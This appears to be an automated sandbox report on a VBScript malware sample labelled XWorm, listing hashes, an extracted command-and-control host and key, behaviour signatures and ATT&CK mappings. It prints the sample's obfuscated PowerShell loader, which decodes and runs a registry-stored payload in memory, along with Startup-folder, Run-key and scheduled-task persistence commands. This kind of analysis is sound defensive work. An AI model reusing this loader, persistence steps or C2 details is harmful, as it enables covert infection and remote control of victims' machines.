Analysis
-
max time kernel
91s -
max time network
202s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-06-2024 20:40
Static task
static1
Behavioral task
behavioral1
Sample
FUD.vbs
Resource
win11-20240611-en
General
-
Target
FUD.vbs
-
Size
51KB
-
MD5
26bc3ae0510eb0a95be6a04e7bcbfcfd
-
SHA1
02a8d91671167e9eb394e3be68c909c4b30212e8
-
SHA256
825d0918656842496be2186889202fd231c7f823f2a8f788e7a8a2f3b91e1c28
-
SHA512
be82ba27267d5486b2181a18cba0397587d5f3d3de573d9b2e3e0ba8e5479dbb15dfb3c708005c6c3882b592de24a8188e40942d8d8ccfe33f5377f9521e4f08
-
SSDEEP
1536:x6wVdHzZQwZ9SkelLyAPh0voJKfI2jygScsddWZrv+V+:x6w7zJ9reVUvWII2gJdWZT+V+
Malware Config
Extracted
xworm
5.0
modern-educators.gl.at.ply.gg:23695
5TVJCEjsbmht8pkD
-
Install_directory
%Userprofile%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3756-15-0x00000188212E0000-0x00000188212F0000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 2 3756 powershell.exe 4 3756 powershell.exe 5 3756 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Drops startup file 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows backup.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows backup = "C:\\Users\\Admin\\Windows backup" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 244 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3756 powershell.exe 3756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3756 powershell.exe Token: SeDebugPrivilege 3756 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.execmd.exedescription pid process target process PID 4708 wrote to memory of 3756 4708 WScript.exe powershell.exe PID 4708 wrote to memory of 3756 4708 WScript.exe powershell.exe PID 3756 wrote to memory of 4172 3756 powershell.exe schtasks.exe PID 3756 wrote to memory of 4172 3756 powershell.exe schtasks.exe PID 3756 wrote to memory of 4736 3756 powershell.exe schtasks.exe PID 3756 wrote to memory of 4736 3756 powershell.exe schtasks.exe PID 3756 wrote to memory of 1648 3756 powershell.exe cmd.exe PID 3756 wrote to memory of 1648 3756 powershell.exe cmd.exe PID 1648 wrote to memory of 244 1648 cmd.exe timeout.exe PID 1648 wrote to memory of 244 1648 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pro hacker.vbs'; $impounding = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $impounding = -join $impounding[-1..-$impounding.Length];[<##>AppDomain<##>]::<##>('nonconstructivenessurrentDomain'.replace('nonconstructiveness','C'))<##>.<##>('handhiddenoad'.replace('handhidden','L'))([Convert]::FromBase64String($impounding))<##>.<##>('dynamistsntryPoint'.replace('dynamists','E'))<##>.<##>('Inpandiedoke'.replace('pandied','v'))($Null,$Null)<##>;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows backup" /tr "C:\Users\Admin\Windows backup"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4172
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows backup"3⤵PID:4736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp55EB.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:244
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
171B
MD57042c11eb8fc9c15c066d2a6ae961964
SHA1a40c23cbf8ab7b28c7d1a11a4614ae906220468a
SHA256aa183b22bfd130bcdd19b054ab7c707efd2c05086c64c76cfcb00cc760880535
SHA512fceca003d2095e4a20299e1bc89dd67ca46322119c384384112e94a6693dfae8ce9ad6e6b9923bb7d6329bab3642589688964021b5b15238caf33dfb22d4fcf5
-
Filesize
126KB
MD57986b3b517f489617d79108122fcd8cf
SHA184f552ae09664b01d7373e991b1a13de4e87b9a9
SHA2568db9f6122ec98cb9b193f686b1c14beabd5d704dae837aa9b681f81ecb65acf5
SHA512cbc0b992724221bc0c9afd2c8632d8624a3804ab6517d48f5f215d2611ee3dc06d620db114546b11102506887daa0cc5b222438e63833fb1e5fecd3e837e4254
-
Filesize
233KB
MD594a8a32cf8dfddf84632d0a3c33cefe5
SHA1bbede4cf5f5691dc13be3a227cf5dacf69620c95
SHA256b9d852b551bce67e2a5c0b35ac415c81e541b5ac38034fdc29ab8675b1d7c09c
SHA512b0694d60e86e647e91244f560fee19c83bf3357ac40608e1bd7e20781eb02bc256a873ed0257acc2aff26fe1f5a8161526f8bfcd4354cd1d32b4690b62d8d732
-
Filesize
200KB
MD5cc353cf6bed7da0eac3e767eaf403666
SHA14b451a58656fe9038d815a3da8099bc90d6cd80d
SHA256cee873ccd4bc25d5d3650076866d946bd65369ba551259514f229a0f77c770c9
SHA5120595e02a4c84622eec931199cc30016d66b9de741bc3ace82e6b2d501ec1aaeb70f6903be857d68bca5c649d493e80e4fe68aea63a8095c4eae3bd30d2d6de2d
-
Filesize
217KB
MD5dbbc8bad95d94a4815747f867a735ca1
SHA10fa74d91c3aedc1ea05592a9f88a53040bb6d4b1
SHA25670fb38cd728c7f53bbabcf5d513ca46a8c8ec69e39e919ff012de3fcfd6a3602
SHA512b66f5e0436c96f834995da554749d018813511ef7ecfa63bae21cd122ad128c0613df6b862c394caea4f9013fc49577a0e32ac98ac695aa4c673d51ee42e6989
-
Filesize
110KB
MD5fd1e66e0b4ee59c00a3faee2c3909220
SHA1d1a2e3ccc183e948f3f3cecd9f7d678ee83359b8
SHA256d20ca151c4250e1b7098a396133745bc7d14e5ab58ceebdde505e211d4550c68
SHA512bf369cef7b6f550d168529e7befff98530353ac67d6deb21f0f65b419267bc6380b50f060eaa332f9f4f96c4c658e61395c4d52342d6e08a8b145da5023ac420
-
Filesize
167KB
MD5e8b13804c289df44e8434f76b05e9c15
SHA15db6b63657391a93e0413be87681922aec3932ce
SHA25643552fe4655dfa5826292625dc20ebd8903a5943e60e10fad5f2d9ca43cf7208
SHA51280c9028b4d8d3f720be48e9f1e43f4955052bc93ccc689bc8229d8f20e15955776961ad98f8e9be05861a4175fc6b4ea82301f03456a7aaeeceb16333fbfb856
-
Filesize
274KB
MD50542f85297fe66c231d4eec49bd8313a
SHA110ceb5155363beaf47449b980f8a16efabaeca20
SHA2561184982bddc6bed09acd573f05343309084b16f248f203e3156739e3c5fb8dfe
SHA51232ed3c5ee4be97a98fbf803c927c45abf940580b6fd434eca8546f45e01b9d363073aad51c2b3c68573f2b1734e2a370cf87038358ed0fc912d607b265db004b
-
Filesize
118KB
MD5ef4d554bfd99d8da1ae8eb52f88e485e
SHA1a940f9c9ca9c3f9c466e5e250c4681900b6af287
SHA2568f4eb7fe0d8991bf95ee95e79b9b8af0ffeef9607ed1cd30372f24fc1238eb30
SHA51297318d4bcf043b4c64b6dbc695e1edb0a8f976cff179387d4d7353d2aec2fdcf572606d1e56ec26e254b9aecfb3e05bb1fdd2d60847b14a06633a60cc6526b56
-
Filesize
208KB
MD56c3e664da2573086709d18b3d777786e
SHA15b93a74805353a27e2570f125f4ed2ac8ce6781c
SHA256455640aced94e6bc1e54c008d34a132c2e918dfff7685e81b39d298e8d5555e1
SHA5124b70b2e62dec3ba0f8745d4d9c8f5e21d366217a67243571967a8fbbad8198b1832270549819530fd7834f777c55c4b69ae15899f70122b13ab64f2a20977da4
-
Filesize
2KB
MD58bd6778743049548d88fd68cead40673
SHA1055c8880b05a6944d61960d0ef9ae2ab8d2d6d13
SHA2561b9dd459eee3286e207f80698e90ac599b61e2613141b391c318a10caf54fa72
SHA512a42b4a948de6c8552a9954e88c84eb08ae212653bf920e3a905bcb652ecf76ad81b55e23443b053cbadd62b44274372b39171c3a2a0f1e5634bee2a0708c8db4
-
Filesize
258KB
MD5338c2df1c8f6fcc751831566d950252a
SHA1062324cc77147ccb00810c7cad98bc3424b39fdb
SHA256e75bea9ed43b12e5ae88d8b154d94145e60244ef1ae40fe6ed2f4f34e8227df2
SHA512dd6c27891acdd1324d659692d28a75780141e4c08bd8e845eadbe48d20740be67d42bcffbadb09cf52f1e3706c13f3d970e30c60c100a15ad46720de4422df99
-
Filesize
282KB
MD56bd9b40e6c55f845e0c93c0996d50767
SHA11426b8994e7943f9705a6544179bf1be617d43d3
SHA256057a7d47a4a33b9b5a035a8c78319cc2d83a97e011c6d4e6c20813bdfddfc7a3
SHA5126dd44dc0e178f4ef743884072e19b026a3d9c7fb633453295cefaf9a64d683d872edc7fe09a6a2078fdd446d0b448157e020a9a47906b1be1daf86657ac26eec
-
Filesize
176KB
MD5c32c641439e79a72c3136f286f8e5237
SHA1317f0e592b5d7a108740540de16e4f780c1c445a
SHA256a002f64564a71b51de263d2d6af5d94744d622bd6286c48056666c700dc5175e
SHA51207232dd5dfac74dffe13ffb599d1b5516d284da4bd18cf059024ffd1023b9e8793ebab1b1fc1a1dfc0c699725f2dd5a8e311610946ca895eb1b3de068958f944
-
Filesize
159KB
MD5e87cff96a2978aecda7de6575ab7526f
SHA1183494e887ec59366f4e9b31dec50f74c1854b9d
SHA25645a7ff7d9b2cb3d0a67591a23f8307003e57187d6dd9a30906af645802990e26
SHA512671c8f1b41d5d2e91e49a9fbde1e4a92b4ce104a7ea301a5ac5c37dcfb434b97e9df080616cc8f49dbad769802586b5b3b75920d38ccdd3f0af52e53ec9a3cee
-
Filesize
401KB
MD50bba5dc28e5a60f457a07f78b5d3e43d
SHA18f3e60b559288f3b77a7c4e95b88db5a36a2dd77
SHA25602ad4361ff95ee2f909551d9a6a296986c726ac2cefd9197f12c1ac72928e655
SHA5126f69fac496cfe876b41367d366a85615d581586b7e99df9a941c129b5b85cfc3ef7f7880a07a922415ca0ff089e58b59e617c874594e06b9f582a8287675f31a
-
Filesize
249KB
MD5e20053933becd770dcab6630cdb74748
SHA11df3571a0f00605e1e41138278f1d63618d0ddac
SHA256083b13b7d04ed76220aa1fb1cd77a3572a509f52b738a90d40ffc607f3f7caea
SHA512b41c6a80ca606c7ed3659ff16ee74c3a4d9a1d30d084c578f4cc333c7b00bbd61fcd2976aafd44b76a6dec7d420309e774fa01344537bc18178d53ec27500623
-
Filesize
192KB
MD514ad2250e861ea5bfd01f789972188ee
SHA13f8fb9415f9bb4946c777a5af1457073711411c0
SHA256d5bb46894d0c200773ab8ec232a0ade11e0b43f1bdfe51cfcece93c60fd8b585
SHA5120f9e13278dad276b21c29ef7de8624d1d27951fa5f5e533eaa6e267c391b799961b72774c9193ec45a31081bd50805bfc9d5abd8713960819b8a6e654f9cf22a
-
Filesize
135KB
MD5d321c265ba7a2b313d2d6bc30c1e0a37
SHA15c2a1d17feb7259d457f6d8fa5058db5afec9c94
SHA25679f81c327985134d74e978430537bd7eb8d7f9b65c775a0b4dc1ea433d41cf7f
SHA512b9c1efbaff2677169a2fc325c5ef5f0a4f92461c99d313726149958e6123a849e3be3e0e61a9dde4c92a701111353c84b036858bf2f4f2b3f7bc980a44caba52
-
Filesize
225KB
MD5af6d1580060269b90686aabe1833f61e
SHA1e1a8da0f2723e7eaa51d5b3c575f674fe745de05
SHA256e16b73836a15d028600ae095b74f20438b514453788e46f9866ccbd2e34c5a6c
SHA512f73f3c452ba7c1696e9e3704b83449ab2fdfacdccd7dc90fd5d656614e69e0c0272e3a8f8f624b5139da60f4130a587de0d213451271fabaecf7fe91aaac601d
-
Filesize
241KB
MD5ac78f601094e989bcd642b1badeb7e83
SHA185c4c32d0e496c975fc92275746c3c9de24c43b5
SHA256d3c920184d9491cb7ae8b57000be92a3508345df70d471a67698a29b55d5c400
SHA5129ed4f93a34fdebaac9ccf2285f1c8b77bf238b5c451fb1ffefb00e8c6d7024b0abe99d6f2e9c28de9d2f3a5cd12cec308dddb6eadfd116499f00b8d169cb99a1
-
Filesize
143KB
MD53936334591fabba1ab7c66613cae789a
SHA1fb7327e15408e4b2d13598ef68f91765a409e560
SHA2568532511d4abfa14d335e672144566f63d1d18b527bc2f54b957fea79d95d29d2
SHA51230fae0d788258b0bc729d3fb12e99de4f90bf2faec9d61399b87ee82d2bbb0eb341c4b57fc014606fd9a756bfffa101976779b832f80be93d898f560e0c2eceb
-
Filesize
102KB
MD57b6f067931ad6057c806bacb5068fdc7
SHA1bd98c7e26f0302b1bd5b935f684a39b9239ff4c0
SHA2566de88ea9fe9eb233c4be7b77280374065d2ec18e40bd55645ce15c5b3e4cf9dd
SHA512209aa77605fa8e4aabd229473da671f13e1ab814e6bad3a4191eb300fa0d7a122f1f701cb7c8e7ac452d424b1c4bf59a4d82b32f0db3ee273c2fd29547fe34b9
-
Filesize
151KB
MD5fc2a7db6ced77008f49ea76806253610
SHA173049c82c2a8760bf4aa298b7c9ac8289764d2cb
SHA25667bf4980fa5e358ecca3b8fa39a066c338efd9182cedcf6db9231f288c415b7c
SHA512d86b4ed7beedd9c0a8fae80dfd799f319652bbc284591c89d181e294cd72b01acaf715bdeac3d6cec6d2d4fb96b2c3ed19a5d536615e0e381015eeca6788f83c
-
Filesize
184KB
MD5e711276eec6f475322a7632e9b291938
SHA13e47b6207c8d8b62a2f6ca27bc51377c02b545be
SHA256407492babb42b73c36fed75f5092f33f8948f2ca4111ecdfed87d412f3b3edbf
SHA5126e2ff1c158d6c000bbe0a83f9c2cd8deb7d4f8357a70ca8d281aa39993c822f0d81be6382c5a7757cd1daf261d486f50d91a75708d67858872d9912f79db7594
-
Filesize
290KB
MD5aa87869e275995b1e6387212d049b9b7
SHA112fe2f5bb81cab5c76970bb5901d8b1e4fadc51f
SHA2563fd0912caebe501ae112787a2621fd31ce67c2b0e9b8d07af357db6668d50350
SHA51205783195dcc067fd4c3e316f56d1a27af8aa364f1f89b89638e91c114521877c008bd552856fc92c02deacb3d95cc98316f7ebac76da5eacd086d41bc1f871b0
-
Filesize
266KB
MD5b5799340ca2c56b3f188bdfaf3e95cc8
SHA1cf3bece36d59c0ae21be2798eadf57114ea2c946
SHA256b6d9b58735f9447ceab09849fbdacb8c65d536ed36d57dd1dbba498f56c6cbf5
SHA512d60400cf8200b864852ffa17c112a036034266d8c58cc870f51a29310f09006b4d17471eea1f5c05dd9e1a99b5a82e119158a460d88619a50268b79b0674f21b
-
Filesize
2KB
MD53332937217e7fc3a5994f76f77e4a494
SHA12c41a6c81255c2854ce06fe91595c82d1286960d
SHA25617773d25ce1e097da6df927e39f80645cec3285f6a1b7ab29bb818e67bf4cc63
SHA512c42aaa6db3f76a671d3aab8fc4acaa3a6b7825d1a54795639708530fc4ba361c54e004cc1119b72786cdec59eeadcef76752887ba476db84ca66f44993205573
-
Filesize
1000B
MD52c07f1e472e3cba6aa935cfafca03051
SHA19691fb753c4fb7f1ea26781b08f26cab6e4ba22c
SHA25632d675963d02343c0854fef3b004b57413e11571e0b8f8c94e468550d73df7e9
SHA5122261be317c330e91fa76a2f7ba9836ed411014ea1ddc22eb9062c044bf21fd858f7211bf199f7ac7474306af9700ee8956c11c6d6d65b89cc2d5e63412ac05dd
-
Filesize
2KB
MD5d1435ac505580e87f8a3b30d2fe93a99
SHA1e0f85c87d90a326bdaa3f7e5bad4fa090599698f
SHA256a6e73a4bc4305745a8211123e806a39dc4f3149c19bc1a89d62e6ae2b6f824bd
SHA51235b4838de98e194ab9285d9d6f19090aab7d397a677648fb4011735c66cd776f1679ff47658b1ad924dc5c1481903facd3dafb7d351d3c698318a452dc1c1880
-
Filesize
923B
MD50c7a77608acbf8767fe0441b8d33e842
SHA14676d9815f8c50bd9b92fe22ace1031e537e27a9
SHA2564a9d8837aa082ff9716ec74f9c4b9d164ea1f4246b324b6e8e17f9de61e1fa46
SHA5128ce663cd75bd65fdbcd51d4b71484d926ed80f5950b9379156c0fdaee10c4fd3bf575803bc1b2f146f0e5619bba9bf9477d3c8919c2ff0b67f54c075dc592d7d